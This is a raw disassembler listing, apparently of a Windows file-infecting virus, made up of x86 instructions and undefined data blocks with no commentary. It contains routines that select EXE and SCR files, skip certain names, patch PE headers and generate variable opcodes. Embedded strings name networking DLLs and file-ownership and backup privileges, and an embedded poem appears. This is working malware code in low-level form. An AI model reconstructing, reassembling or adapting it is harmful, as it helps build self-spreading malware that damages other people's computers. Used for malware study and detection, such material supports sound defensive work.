; __u_____:00412FB4�j
loop loc_412FAA
jmp short loc_41302D
; ---------------------------------------------------------------------------
loc_412FDD: ; CODE XREF: __u_____:00412F9F�j
call near ptr dword_412684+47Fh
cmp dword ptr [esp+8], 4
jnz short loc_41302D
call near ptr loc_412FF5+1
push ebx
inc esi
inc ebx
db 2Eh
inc esp
dec esp
dec esp
loc_412FF5: ; CODE XREF: __u_____:00412FE9�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add [ebx], cl
sal byte ptr [ebp+ecx-6Dh], 6Ah
add dl, [ebx-1]
xchg eax, ebp
outsb
db 3Eh
adc [eax], al
call eax ; ExitProcess
xchg eax, ebx
call near ptr loc_412EA7+2
call near ptr loc_413021+1
push ebx
inc esi
inc ebx
pop edi
dec edi
push ebx
db 2Eh
inc esp
dec esp
dec esp
loc_413021: ; CODE XREF: __u_____:00413012�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add al, ch
loc_413029: ; CODE XREF: __u_____:loc_413029�j
jl short loc_413029
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
; ---------------------------------------------------------------------------
loc_41302D: ; CODE XREF: __u_____:00412FDB�j
; __u_____:00412FE7�j
call sub_412632
dec dword ptr [ebp+1012D4h]
xor ecx, ecx
lea eax, [ebp+104324h]
push ecx
push ecx
push ecx
push ecx
push eax
push ecx
push ecx
push ecx
call dword ptr [ebp+103EC2h]
call near ptr loc_41305D+1
push ebp
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_41305D: ; CODE XREF: __u_____:0041304E�p
add bh, bh
xchg eax, ebp
mov byte ptr [esi], 10h
add al, ch
or al, [eax]
; ---------------------------------------------------------------------------
db 0
dd 70737700h, 746E6972h, 50004166h, 3E6E95FFh, 85890010h
dd 103E76h, 8D8D310Fh, 101985h, 3F7C8589h, 0FF510010h
dd 103EC695h, 4689300h, 8D000000h, 101992B5h, 0BD8D5900h
dd 103F62h, 0FFF5C2E8h, 85C766FFh, 101E75h, 0A5835000h
dd 101E77h, 35958D00h, 5000101Eh, 6A016A54h, 2685200h
dd 0FF800000h, 103F6695h, 5AC08500h, 8D8D2275h, 101E68h
dd 8D066A52h, 101E75B5h, 50565400h, 0FF525150h, 103F6A95h
dd 95FF5800h, 103F62h, 418385C6h, 0E8000010h, 0Ch, 434F5357h
dd 2E32334Bh, 4C4C44h, 3EC695FFh, 68930010h, 7, 18E9B58Dh
dd 8D590010h, 103F32BDh, 0F53DE800h, 0CE8FFFFh, 57000000h
dd 4E494E49h, 442E5445h, 0FF004C4Ch, 103EC695h, 0FC08500h
dd 23584h, 5689300h, 8D000000h, 101927B5h, 0BD8D5900h
dd 103F4Eh, 0FFF506E8h, 52BD83FFh, 103Fh, 210840Fh, 0EC810000h
dd 190h, 1016854h, 95FF0000h, 103F32h, 190C481h, 8B500000h
dd 52006AD4h, 3F5295FFh, 0C0850010h, 680D7559h, 1388h
dd 3EE695FFh, 0E2EB0010h, 1E77BD83h, 75000010h, 7B858D29h
dd 5000101Eh, 3F3E95FFh, 0C0850010h, 189840Fh, 408B0000h
dd 0FF008B0Ch, 77858F30h, 0C600101Eh, 10418385h, 6A0100h
dd 26A016Ah, 3F4A95FFh, 0F8830010h, 60840FFFh, 93000001h
dd 1E73958Dh, 106A0010h, 95FF5352h, 103F3Ah, 850FC085h
dd 140h, 1E94BD8Dh, 8B10010h, 0FFFA3CE8h, 9468FFh, 2B5E0000h
dd 243489E6h, 0BE95FF54h, 8D00103Eh, 101EA2BDh, 0E801B100h
dd 0FFFFFA1Dh, 1E8F958Dh, 6A0010h, 1468h, 0FF535200h, 103F4695h
dd 24448D00h, 24958D14h, 50001043h, 8B0AB60Fh, 0C1142444h
dd 4A0208E0h, 24A1201h, 0B034A12h, 80082444h, 0E0C10FE1h
dd 440B5108h, 32FF1024h, 84BD8D50h, 0E800103Fh, 1Ch, 78362E25h
dd 2E202E20h, 25253A20h, 78382E25h, 25207825h, 4F4A0A73h
dd 204E49h, 7695FF57h, 8100103Eh, 0ACC4h, 50006A00h, 95FF5357h
dd 103F46h, 15988D8Bh, 6A0010h, 0C96B1BE3h, 5E8510Dh, 26000000h
dd 0A6425h, 7695FF57h, 8300103Eh, 0EB500CC4h, 7680Bh, 0BD8D0000h
dd 101EA8h, 95FF5357h, 103F46h, 547EC085h, 3F84B58Dh, 0A5830010h
dd 101598h, 838D8D00h, 2B001041h, 51006ACEh, 95FF5356h
dd 103F42h, 7E00F883h, 0FE8B912Fh, 3F84B58Dh, 0DB00010h
dd 1075AEF2h, 0FA2AE860h, 7261FFFFh, 8D09E317h, 0EAEB0177h
dd 0CE2BCF8Bh, 3F84BD8Dh, 0A4F30010h, 0B9EBF787h, 3695FF53h
dd 8000103Fh, 10157FBDh, 2A740100h, 753068h, 0E695FF00h
dd 8000103Eh, 104183BDh, 11740000h, 1E7785C7h, 10h, 85C60000h
dd 104183h, 0FE08E900h, 85C7FFFFh, 101588h, 80000000h
dd 4C25Dh, 204F0A0Dh, 6E6F6F6Eh, 20666F20h, 6566696Ch
dd 204F2021h, 656D6974h, 206F7420h, 656C6563h, 74617262h
dd 0A0D2165h, 20202020h, 73204F20h, 656D6D75h, 61672072h
dd 6E656472h, 520A0D21h, 6E656C65h, 73656C74h, 20796C73h
dd 70706168h, 6E612079h, 78652064h, 74636570h, 2C746E61h
dd 61747320h, 6E69646Eh, 2D203A67h, 61570A0Dh, 69686374h
dd 6120676Eh, 64206C6Ch, 61207961h, 6E20646Eh, 74686769h
dd 6F66202Ch, 72662072h, 646E6569h, 20492073h, 74696177h
dd 570A0D3Ah, 65726568h, 65726120h, 756F7920h, 7266202Ch
dd 646E6569h, 43203F73h, 21656D6Fh, 20744920h, 74207369h
dd 21656D69h, 27744920h, 616C2073h, 4216574h, 2930C784h
dd 0CE10A614h, 8418D5DBh, 0CEF8C4A6h, 48864F88h, 0AF403752h
dd 0FE606E7Fh, 87BD4000h, 52BEF653h, 5CD8B8B3h, 66C26CCCh
dd 9C774h, 13h dup(0)
dd 60000000h, 42F4A583h, 83000010h, 1042F8A5h, 0B70F0000h
; CODE XREF: __u_____:00414073�p
; __u_____:004140B0�p ...
dd 538D1443h, 4BB70F18h, 8BD00306h, 2B242444h, 19720C42h
dd 7308423Bh, 14428B14h, 890C422Bh, 1042F495h, 0F8858900h
dd 0EB001042h, 28C28305h, 0C261D9E2h, 85880004h, 102467h
dd 64E8h, 206800h, 858D0000h, 102394h, 74183959h, 4C0830Ch
dd 85FFF7E2h, 1042D0h, 3D9F7C3h, 1024678Dh, 0FF10E300h
dd 8FFC70h, 0E204E883h, 949D89F6h, 83001023h, 574003Ah
dd 7203322Bh, 0FC4E8D10h, 835E5B58h, 474003Ah, 3EB32FFh
dd 0E81072FFh, 0FFFFFF57h, 8D2BCE2Bh, 1042F8h, 344B0358h
dd 0D4858FC3h, 0C7001042h, 1042D085h, 0
dd 3CE800h, 858B0000h, 1042D0h, 0FFF6A9E8h, 18E8FFh, 0BD830000h
dd 1042D0h, 89087500h, 1024109Dh, 0FF9CEB00h, 1042D08Dh
dd 858FC300h, 1042D4h, 42D09589h, 3E80010h, 33000000h
dd 938BC3C9h, 80h, 0FEEDE852h, 9503FFFFh, 1042F8h, 7A83D603h
dd 840F000Ch, 107h, 107A83h, 0FD840Fh, 428B0000h, 0C8E8500Ch
dd 3FFFFFEh, 1042F885h, 50C60300h, 0F980088Ah, 80197400h
dd 3742EF9h, 8BF1EB40h, 0E1810148h, 0DFDFDFDFh, 4C44F981h
dd 0EC75004Ch, 83C82B59h, 8F0FFAF9h, 0B7h, 0FE788166h
dd 850F3233h, 0ABh, 3A8356h, 4A8B0575h, 8B02EB10h, 51F1030Ah
dd 0FFFE72E8h, 0F8B503FFh, 0AD001042h, 0FB78C085h, 84840Fh
dd 0B5FF0000h, 1042F8h, 0FE55E850h, 8503FFFFh, 1042F8h
dd 42F8858Fh, 4030010h, 0C0835324h, 0FDB3302h, 12E308B6h
dd 5320C980h, 42424C1h, 29241C29h, 405B240Ch, 0FB81E9EBh
dd 0DDBBD70Fh, 0FB813E74h, 0DB6E45A8h, 0FB813674h, 0FFA13B59h
dd 0FB812E74h, 0ACB522D6h, 0FB812674h, 0F358E993h, 0FB811E74h
dd 0F358E97Dh, 0FB811674h, 0E1253F46h, 0FB810E74h, 0E1253F30h
dd 95FF0674h, 1042D4h, 0FF71E95Bh, 835EFFFFh, 0EFE914C2h
dd 0C3FFFFFEh, 58046A03h, 0FFF549E8h, 419588FFh, 66001026h
dd 21831B8h, 3E4C0E2h, 0AB66E202h, 0E858066Ah, 0FFFFF52Eh
dd 8708C283h, 58056AD1h, 0FFF521E8h, 3FA80FFh, 50B00B73h
dd 26418502h, 0EBAA0010h, 58686A27h, 3FA80AAh, 11B01875h
dd 0FFF501E8h, 1B8FFh, 0D2840000h, 0E0D10D74h, 0F6EBCAFEh
dd 0B805EBh, 0AB800000h, 8DC3BFE2h, 1039CC95h, 0F7D72B00h
dd 85F7C3DAh, 1039C0h, 10000000h, 0C1C0950Fh, 85F60BE0h
dd 1039BEh, 66067501h, 0EB25890Dh, 0BE85F613h, 2001039h
dd 0D660675h, 4EB2531h, 25010D66h, 0BCE8AB66h, 8BFFFFFFh
dd 95893443h, 1042E8h, 85F7C3ABh, 1039C0h, 10000000h, 4C0950Fh
dd 9CE8AABCh, 89FFFFFFh, 1042EC95h, 0BE85F600h, 1001039h
dd 310F0475h, 0C02B02EBh, 85F7C3ABh, 1039C0h, 10000000h
dd 858A2774h, 1039BAh, 660BE0C1h, 66458B0Dh, 0AAF8B0ABh
dd 39BA858Ah, 0E0C10010h, 6467051Bh, 33AB0689h, 0EBAB66C0h
dd 8F64B812h, 8AAB0005h, 1039BA85h, 0C1580400h, 0C3AB18E0h
dd 279C85C6h, 0EB090010h, 0EBFCB025h, 0EBB86620h, 0EBAB6600h
dd 58046A19h, 0FFF409E8h, 0D2048DFFh, 6608E0C1h, 66C08905h
dd 0B003EBABh, 1B6AAA90h, 0F3F0E858h, 8580FFFFh, 10279Ch
dd 8FA8006h, 0D2842F73h, 2 dup(0CAFEC374h), 0CAFEC774h
dd 0CAFED974h, 0CAFE0C74h, 0CAFE0F74h, 0F9B00F74h, 87B0CBEBh
dd 0EBDBB0AAh, 0EBF5B0C4h, 0EBF8B0C0h, 85F7C3BCh, 1039C0h
dd 2000h, 27586B0h, 4F8D0404h, 0B8A58AFEh, 66001039h, 5FC80ABh
dd 0B00775h, 40FF4F80h, 0FF62E8AAh, 85F7FFFFh, 1039C0h
dd 4000h, 3166B866h, 29B40275h, 18B0AB66h, 39BA850Ah, 0E0C00010h
dd 3DE8AA03h, 0B0FFFFFFh, 0C085F788h, 1039h, 75000080h
dd 8A86B002h, 1039B8A5h, 80AB6600h, 77505FCh, 4F8000B0h
dd 0C3AA40FFh, 39CCBD8Dh, 0DE80010h, 0F7FFFFFFh, 1039C085h
dd 40000000h, 0B0037400h, 85F7AA60h, 1039C0h, 10000000h
db 74h, 7, 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add [ebx-3F7A08B1h], ch
cmp [eax], edx
add [ebx], al
; ---------------------------------------------------------------------------
dd 0F020000h, 0F084h, 0AAE8B000h, 0D8BD89ABh, 0E8001042h
dd 0FFFFFECCh, 0ABAAE8B0h, 42DCBD89h, 0BDE80010h, 0F7FFFFFEh
dd 1039C085h, 300h, 0F71A7400h, 1039C085h, 0
dd 0E80A7402h, 0FFFFFE2Eh, 0FFFE9BE8h, 0AAE9B0FFh, 0D8858BABh
dd 8B001042h, 89C82BCFh, 1042E0BDh, 0FC488900h, 0FF6467B8h
dd 0C033AB36h, 85F7AB66h, 1039C0h, 3, 85F61374h, 1039BEh
dd 0E80A7480h, 0FFFFFDAAh, 0FFFE5BE8h, 6467B8FFh, 33AB2689h
dd 0F7AB66C0h, 1039C085h, 300h, 0F65A7400h, 1039BE85h
dd 0A758000h, 0FFFD81E8h, 0FE32E8FFh, 2E8FFFFh, 0B0FFFFFDh
dd 0FB14E820h, 39E3FFFFh, 15FFB866h, 0AB91AB66h, 39C0958Bh
dd 0D2F70010h, 3C2F7h, 14750000h, 0FFFCDCE8h, 0E81FB0FFh
dd 0FFFFFAEEh, 15FFB866h, 0AB91AB66h, 858BCF8Bh, 1042E0h
dd 4889C82Bh, 0C085F7FCh, 3001039h, 74000000h, 0C085F738h
dd 1039h, 740C0000h, 0C085F72Ch, 1039h, 75020000h, 0FDC2E80Ah
dd 4BE8FFFFh, 0F7FFFFFDh, 1039C085h, 0
dd 0E80A7408h, 0FFFFFDACh, 0FFFD61E8h, 0C085F7FFh, 4001039h
dd 74000000h, 0FD96E817h, 29B8FFFFh, 0ABC8FEC0h, 74C008B8h
dd 75B8AB04h, 0AB67EBF8h, 0FFFD7FE8h, 0C085F7FFh, 8001039h
dd 75000000h, 0BEBD8072h, 1039h, 65E86974h, 0B8FFFFFDh
dd 0C9291829h, 39BAA50Ah, 0E4C00010h, 0BAA50A03h, 0AB001039h
dd 0FFFD4BE8h, 0AAB1B0FFh, 39BE858Ah, 0E8AA0010h, 0FFFFFD3Ch
dd 0BA85B60Fh, 8D001039h, 4004C004h, 0B008E0C1h, 0B0AB668Dh
dd 0E857AA01h, 0FFFFFD20h, 66243C29h, 59FBE2B8h, 39C085F7h
dd 100010h, 7740000h, 66AA49B0h, 2FA75B8h, 0E8AB66E1h
dd 0FFFFFCFCh, 33AAE8B0h, 0BD89ABC0h, 1042C4h, 39C085F7h
dd 200010h, 3B750000h, 0FCDEE857h, 85F7FFFFh, 1039C0h
dd 80000000h, 0BD891874h, 1042F0h, 0FFFD39E8h, 0FCC2E8FFh
dd 0C3B0FFFFh, 0FCBAE8AAh, 8B5AFFFFh, 2B58B0CFh, 0B8850ACAh
dd 89001039h, 0E8AAFC4Ah, 0FFFFFCA4h, 0C081B866h, 39C085F7h
dd 400010h, 3740000h, 0A28C480h, 1039B8A5h, 89AB6600h
dd 1042C8BDh, 85F7AB00h, 1039C0h, 40000000h, 50B00975h
dd 39B88502h, 0F7AA0010h, 1039C085h, 8000h, 0B00B7500h
dd 0B9850AB8h, 0AA001039h, 0B8663DEBh, 85F71831h, 1039C0h
dd 100h, 29B00274h, 39B9A50Ah, 0E4C00010h, 0B9A50A03h
dd 66001039h, 81B866ABh, 0C085F7F0h, 1039h, 75000002h
dd 0AC8B402h, 1039B9A5h, 89AB6600h, 1042E4BDh, 29CCB800h
dd 0F7AB0000h, 1039C085h, 800h, 0E8717400h, 0FFFFFBFCh
dd 39C085F7h, 4000010h, 0B750000h, 850AB8B0h, 1039BAh
dd 0F74DEBAAh, 1039C085h, 80000h, 66117500h, 0AE083B8h
dd 1039BAA5h, 33AB6600h, 15EBAAC0h, 1829B866h, 39BAA50Ah
dd 0E4C00010h, 0BAA50A03h, 66001039h, 0C085F7ABh, 1039h
dd 66000010h, 74C081B8h, 8C48003h, 39BAA50Ah, 0AB660010h
dd 0BE85B60Fh, 0AB001039h, 0FFFB8BE8h, 0C085F7FFh, 1039h
dd 74400000h, 250B00Eh, 1039B885h, 71E8AA00h, 8DFFFFFBh
dd 8D89FE4Fh, 1042CCh, 39C085F7h, 10h, 17748000h, 8BAAE8B0h
dd 1042F085h, 83C72B00h, 89AB04E8h, 1042F0BDh, 0E805EB00h
dd 0FFFFFBB2h, 0FFFB3BE8h, 0C085F7FFh, 1039h, 75000100h
dd 0A40B00Bh, 1039B885h, 0FEBAA00h, 0C083B866h, 39B8A50Ah
dd 0AB660010h, 0F7AA01B0h, 1039C085h, 2000000h, 0F72F7500h
dd 1039C085h, 4000000h, 0B01A7500h, 0BA850AC0h, 8A001039h
dd 1039BFA5h, 10E0C100h, 8166B866h, 0EB00B0ABh, 0A40B008h
dd 1039BA85h, 85F7AA00h, 1039C0h, 80000h, 0B8661075h, 0A50AE883h
dd 1039B9h, 1B0AB66h, 48B008EBh, 39B9850Ah, 0E8AA0010h
dd 0FFFFFAB0h, 39C085F7h, 10h, 75B10010h, 0B8662575h, 0A50AF883h
dd 1039B9h, 0C033AB66h, 0CCBD29AAh, 0F7001042h, 1039C085h
dd 20000000h, 0B11F7500h, 661BEB77h, 0A1809B8h, 1039B9A5h
dd 3E4C000h, 39B9A50Ah, 0AB660010h, 42CCBD29h, 0C18A0010h
dd 42CCA58Ah, 0AB660010h, 850258B0h, 1039B8h, 0FA4AE8AAh
dd 85F7FFFFh, 1039C0h, 2000003h, 85F72C74h, 1039C0h, 8000000h
dd 85F72075h, 1039C0h, 6000000h, 0AFE80A75h, 0E8FFFFF9h
dd 0FFFFFA1Ch, 0FFF9D1E8h, 0FA12E8FFh, 85F7FFFFh, 1039C0h
dd 10000000h, 0C9B00874h, 0F9FEE8AAh, 85F7FFFFh, 1039C0h
dd 400000h, 7B02A74h, 39B8852Ah, 0E0C10010h, 8890D1Ah
dd 0A5020024h, 1039B8h, 8003E4C0h, 0E8AB04C4h, 0FFFFF9D0h
dd 0E8AA61B0h, 0FFFFF9C8h, 0E0FFB866h, 39B8A50Ah, 0AB660010h
dd 0FFF9B7E8h, 0C085F7FFh, 20001039h, 74000000h, 0C085F76Fh
dd 1039h, 74800000h, 8BC78B1Fh, 1042F08Dh, 89C12B00h, 0FFE8FC41h
dd 0E8FFFFF9h, 0FFFFF988h, 0E8AAC3B0h, 0FFFFF980h, 8D8BC78Bh
dd 1042C4h, 4189C12Bh, 0A58B0FCh, 1039B885h, 65E8AA00h
dd 0F7FFFFF9h, 1039C085h, 80000000h, 660C7400h, 0AC350B8h
dd 1039B885h, 660AEB00h, 0AE0FFB8h, 1039B8A5h, 0E8AB6600h
dd 0FFFFF93Ch, 39C085F7h, 30010h, 5F740200h, 858BCF8Bh
dd 1042DCh, 4889C82Bh, 0F7C933FCh, 1039C085h, 0
dd 8D0E7501h, 1039B885h
db 0
; ---------------------------------------------------------------------------
loc_413F31: ; CODE XREF: __u_____:00413F37�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_413F31
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_413F4E
mov ax, 0C031h
stosw
loc_413F4E: ; CODE XREF: __u_____:00413F46�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_413F67
mov ax, 0C031h
stosw
loc_413F67: ; CODE XREF: __u_____:00413F5F�j
mov al, 0C3h
stosb
; ---------------------------------------------------------------------------
dw 0D1E8h
db 0F8h ; ø
db 2 dup(0FFh), 8Dh
db 85h ; …
align 2
dw 1039h
db 0
; ---------------------------------------------------------------------------
test dword ptr [ebp+1039C0h], 20000000h
jnz short loc_413F87
push edi
sub edi, eax
pop eax
jmp short loc_413FA0
; ---------------------------------------------------------------------------
loc_413F87: ; CODE XREF: __u_____:00413F7F�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+1042E4h]
add [ebp+1042C4h], edx
add [ecx], edi
mov eax, [esp+4]
loc_413FA0: ; CODE XREF: __u_____:00413F85�j
mov [ebp+101069h], edi
mov edi, [ebp+1042C8h]
sub eax, [ebp+1042C4h]
test dword ptr [ebp+1039C0h], 40h
jz short loc_413FC0
neg eax
loc_413FC0: ; CODE XREF: __u_____:00413FBC�j
stosd
retn 4
; ---------------------------------------------------------------------------
db 56h ; V
db 57h, 83h, 0BDh
db 0
db 43h, 10h, 0
db 0
db 0Fh, 84h, 0D9h
db 1
db 2 dup(0), 0E8h
db 0Dh
align 4
db 4Bh ; K
db 45h, 52h, 4Eh
db 45h ; E
db 4Ch, 33h, 32h
db 2Eh ; .
db 44h, 2 dup(4Ch)
db 0
db 0FFh, 95h, 0AEh
db 3Eh ; >
db 10h, 0, 89h
db 85h ; …
db 14h, 43h, 10h
db 0
db 53h, 8Bh, 58h
db 3Ch ; <
db 3, 0D8h, 0FFh
db 73h ; s
db 28h, 8Bh, 43h
db 34h ; 4
db 0E8h, 0E5h, 0F4h
db 0FFh
db 0FFh, 8Bh, 95h
db 0F4h ; ô
db 42h, 10h, 0
db 5Bh ; [
db 3, 42h, 0Ch
db 89h ; ‰
db 85h, 18h, 43h
db 10h
align 2
dw 4203h
db 8
db 89h, 85h, 1Ch
db 43h ; C
db 10h, 0, 8Bh
db 73h ; s
db 28h, 0FFh, 0B3h
db 80h ; €
align 4
db 0E8h ; è
db 0BEh, 0F4h, 0FFh
db 0FFh
db 8Bh, 0BDh, 0F4h
db 42h ; B
db 10h, 0, 56h
db 0E8h ; è
db 0B2h, 0F4h, 0FFh
db 0FFh
db 8Bh, 95h, 0F4h
db 42h ; B
db 10h, 0, 8Bh
db 4Ah ; J
db 8, 3, 4Ah
db 0Ch
db 2Bh, 0CEh, 83h
db 0E9h ; é
db 5, 0Fh, 88h
db 60h ; `
db 1, 2 dup(0)
db 0Fh
db 84h, 5Ah, 1
db 0
align 2
dw 0B503h
db 0F8h ; ø
db 42h, 10h, 0
db 3
db 0B5h, 0B4h, 42h
db 10h
align 2
; START OF FUNCTION CHUNK FOR sub_41417D
loc_41405E: ; CODE XREF: sub_41417D+29�j
lodsb
cmp al, 0E8h
; END OF FUNCTION CHUNK FOR sub_41417D
jnz loc_414109
lea eax, [esi+4]
sub eax, [ebp+1042B4h]
add eax, [esi]
push eax
call near ptr dword_4134E4+3
cmp dword ptr [ebp+1042F4h], 0
jnz short loc_41408C
cmp eax, [edi+0Ch]
jnb loc_4141A5
jmp short loc_414098
; ---------------------------------------------------------------------------
loc_41408C: ; CODE XREF: __u_____:0041407F�j
cmp [ebp+1042F4h], edx
jnz loc_4141A5
loc_414098: ; CODE XREF: __u_____:0041408A�j
add eax, [ebp+1042B4h]
cmp word ptr [eax], 25FFh
jnz loc_4141A5
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call near ptr dword_4134E4+3
cmp [ebp+1042F4h], edi
jnz loc_4141A5
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_4141A5
cmp eax, [edi+8]
jnb loc_4141A5
; START OF FUNCTION CHUNK FOR sub_41417D
loc_4140E1: ; CODE XREF: sub_41417D+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042B4h]
push edx
push eax
push dword ptr [ebp+104314h]
call dword ptr [ebp+103E6Eh]
pop edx
test eax, eax
jnz loc_4141BB
jmp loc_4141A5
; END OF FUNCTION CHUNK FOR sub_41417D
; ---------------------------------------------------------------------------
loc_414109: ; CODE XREF: __u_____:00414061�j
cmp al, 0FFh
jnz loc_4141A5
cmp byte ptr [esi], 15h
jnz loc_4141A5
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call near ptr dword_4134E4+3
cmp [ebp+1042F4h], edi
jnz short loc_4141A5
add eax, [ebp+1042F8h]
add eax, [ebp+1042B4h]
mov [ebp+104320h], eax
mov eax, [eax]
cmp eax, [ebp+104318h]
jb short loc_414152
cmp eax, [ebp+10431Ch]
jb short loc_4141BB
loc_414152: ; CODE XREF: __u_____:00414148�j
cmp eax, 70000000h
jb short loc_414190
call sub_41417D
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104320h]
jnz short locret_41417C
add esp, 10h
push dword ptr [ecx]
pop dword ptr [esp+1Ch]
popa
jmp short loc_414197
; ---------------------------------------------------------------------------
locret_41417C: ; CODE XREF: __u_____:0041416E�j
retn
; =============== S U B R O U T I N E =======================================
sub_41417D proc near ; CODE XREF: __u_____:00414159�p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0041405E SIZE 00000003 BYTES
; FUNCTION CHUNK AT 004140E1 SIZE 00000028 BYTES
pop dword ptr [ebp+1042D4h]
pusha
mov esi, [ebp+1042B4h]
call near ptr dword_4135AC+42h
popa
loc_414190: ; CODE XREF: __u_____:00414157�j
test eax, 80000000h
jnz short loc_4141A5
loc_414197: ; CODE XREF: __u_____:0041417A�j
sub eax, [edi+0Ch]
jb short loc_4141A5
cmp eax, [edi+8]
jb loc_4140E1
loc_4141A5: ; CODE XREF: __u_____:00414084�j
; __u_____:00414092�j ...
dec ecx
jnz loc_41405E
mov edi, [esp+4+var_4]
and dword ptr [edi+29C0h], 0FFBFFFFFh
jmp short loc_4141FD
; ---------------------------------------------------------------------------
loc_4141BB: ; CODE XREF: sub_41417D-7F�j
; __u_____:00414150�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+104300h]
mov [ebp+1042FCh], eax
lea edi, [ecx+29C4h]
add eax, [ebp+1042B4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_4141FD: ; CODE XREF: sub_41417D+3C�j
pop edi
pop esi
retn
sub_41417D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 57h ; W
db 0FFh, 95h, 0BAh
db 3Eh ; >
db 10h, 0, 0C1h
db 0E8h ; è
db 1Fh, 0Fh, 85h
db 1Ah
db 1, 2 dup(0)
db 50h ; P
db 54h, 6Ah, 28h
db 6Ah ; j
db 2 dup(0FFh), 95h
db 1Ah
db 3Fh, 10h, 0
db 85h ; …
db 0C0h, 5Fh, 0Fh
db 88h ; ˆ
db 5, 1, 0
db 0
db 0E8h, 58h, 0E4h
db 0FFh
db 0FFh, 0E8h, 11h
db 0
db 2 dup(0), 53h
aEtfilesecurity db 'etFileSecurityA',0
db 0FFh
db 0B5h, 88h, 42h
db 10h
align 2
dw 95FFh
db 6Eh ; n
db 3Eh, 10h, 0
db 89h ; ‰
db 85h, 90h, 42h
db 10h
align 2
dw 19E8h
db 0
db 2 dup(0), 53h
aEtakeownership db 'eTakeOwnershipPrivilege',0
db 57h ; W
db 0E8h, 29h, 0E8h
db 0FFh
db 0FFh, 0E8h, 13h
db 0
db 2 dup(0), 53h
aErestoreprivil db 'eRestorePrivilege',0
dw 0E857h
db 0Bh
db 0E8h, 2 dup(0FFh)
db 0E8h ; è
db 12h, 2 dup(0)
db 0
aSebackupprivil db 'SeBackupPrivilege',0
db 57h
dd 0FFE7EEE8h, 18E8FFh, 65530000h, 6E616843h, 6F4E6567h
dd 79666974h, 76697250h, 67656C69h, 0E8570065h, 0FFFFE7CBh
dd 858D5450h, 103DCCh, 6A50646Ah, 95FF5701h, 103F26h, 0FF243C89h
dd 103E6295h, 8DC02A00h, 104184BDh, 50505000h, 3DCCB5FFh
dd 1680010h, 54000400h, 0FF57016Ah, 10429095h, 46A5400h
dd 9095FF57h, 83001042h, 0B5FF14C4h, 104288h, 3E9E95FFh
dd 0C35F0010h, 4184B58Dh, 0FF560010h, 103EA295h, 0FFF88300h
dd 0BB840Fh, 85890000h, 104294h, 0FF56006Ah, 103EDE95h
dd 0FC08500h, 0A484h, 50C02B00h, 50036A50h, 68016Ah, 56C00000h
dd 3E7E95FFh, 0F8830010h, 7840FFFh, 89000006h, 10429885h
dd 9C8D8D00h, 8D001042h, 1042A495h, 6A525100h, 95FF5000h
dd 103EAAh, 0FFFF883h, 5D584h, 0FF006A00h, 104298B5h, 0A695FF00h
dd 8300103Eh, 840FFFF8h, 5BEh, 42AC8589h, 0C9330010h, 5051C303h
dd 51046A51h, 4298B5FFh, 95FF0010h, 103E82h, 840FC085h
dd 59Ah, 8589C933h, 1042B0h, 68515151h, 0F001Fh, 0CA95FF50h
dd 8500103Eh, 53840FC0h, 89000005h, 1042B485h, 27B8C300h
dd 8B000073h, 85F7384Bh, 1039C0h, 20000000h, 85030675h
dd 101069h, 0C103D233h, 0E1F7F1F7h, 42C08589h, 0CBB80010h
dd 8B000029h, 85033C4Bh, 101069h, 0C103D233h, 0E1F7F1F7h
dd 42B88589h, 0FC30010h, 0F9064BB7h, 538D35E3h, 43B70F18h
dd 49D00314h, 328C16Bh, 5F3A81D0h, 0F96E6977h, 7A831D74h
dd 0E072010Ch, 8B3C4B8Bh, 42031442h, 48448D10h, 23D9F7FFh
dd 0AC853BC1h, 0C3001042h, 1024548Bh, 828FC033h, 0B8h
dd 0EBCF8BC3h, 84BD8D0Bh, 0FC001041h, 0C933DF8Bh, 72613CACh
dd 777A3C06h, 0AA202C02h, 0EC745C3Ch, 0DD742E3Ch, 0E875003Ch
dd 18BC9E3h, 4558453Dh, 3D0B7400h, 524353h, 0FF33850Fh
dd 38BFFFFh, 4E49573Dh, 26840F43h, 3DFFFFFFh, 4E554357h
dd 0FF1B840Fh, 573DFFFFh, 0F323343h, 0FFFF1084h, 53503DFFh
dd 840F4F54h, 0FFFFFF05h, 2DE8DB33h, 75FFFFFEh, 0FCFAE810h
dd 21E8FFFFh, 0FFFFFFEh, 0FFFEEC84h, 0E8D233FFh, 16h, 0FFFF63E8h
dd 0E8FFh, 815D0000h, 10344FEDh, 3FAE900h, 0FF640000h
dd 0B4B58B32h, 64001042h, 81662289h, 0F5A4D3Eh, 3E385h
dd 3C5E8B00h, 8166DE03h, 0F45503Bh, 3D385h, 1643F700h
dd 2000h, 3C6850Fh, 43F60000h, 840F025Ch, 3BCh, 3D08438Bh
dd 0A0A0A0A0h, 3AE840Fh, 203D0000h, 0F202020h, 3A384h
dd 0C88B8B00h, 0E3000000h, 54E85116h, 3FFFFEFh, 1042F88Dh
dd 83CE0300h, 83004061h, 0E8004461h, 0FFFFFE9Bh, 37A820Fh
dd 0A5830000h, 1042FCh, 8428B00h, 2B104A8Bh, 330473C1h
dd 305EBC0h, 104A89C8h, 42BC8589h, 4A030010h, 0B80Ch, 0E8510001h
